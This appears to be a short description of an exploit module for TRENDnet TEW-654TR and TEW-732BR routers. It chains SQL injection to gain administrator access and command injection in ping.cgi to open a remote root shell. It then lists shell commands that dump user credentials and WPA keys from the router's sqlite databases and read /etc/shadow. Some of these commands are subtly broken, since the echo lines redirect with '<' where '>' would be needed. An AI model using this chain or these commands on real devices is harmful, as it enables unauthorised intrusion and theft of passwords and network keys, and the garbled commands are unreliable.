TRENDnet routers are vulnerable to a range of SQL injection, command injection, and buffer overflow vulnerabilities. Current supported devices include:
TEW-654TR - Remote Root Shell TEW-732BR - Remote Root Shell
A SQL injection vulnerability allows the attacker to elevate privileges from anonymous to administrator. With the administrative access the attcker is able to access the ping.cgi which is vulnerable to a command injection. A busybox shell is spawned on the specified port.
The root shell can be accessed from the Connections tab. The 'File Upload' functionality does not function due to the limitations of the BusyBox shell.
Try the following commands in the interactive shell
echo "select * from user;" < /tmp/selectuser.txt ;sqlite3 /etc/rt.db < /tmp/selectuser.txt echo "select * from user;" < /tmp/selectuser.txt ;sqlite3 /etc/apc.db < /tmp/selectuser.txt echo "select * from user;" < /tmp/selectuser.txt ;sqlite3 /etc/ap.db < /tmp/selectuser.txt echo "select * from wpa_settings;" < /tmp/selectwpakey.txt ;sqlite3 /etc/rt.db < /tmp/selectwpakey.txt cat /etc/shadow
Update the firmware.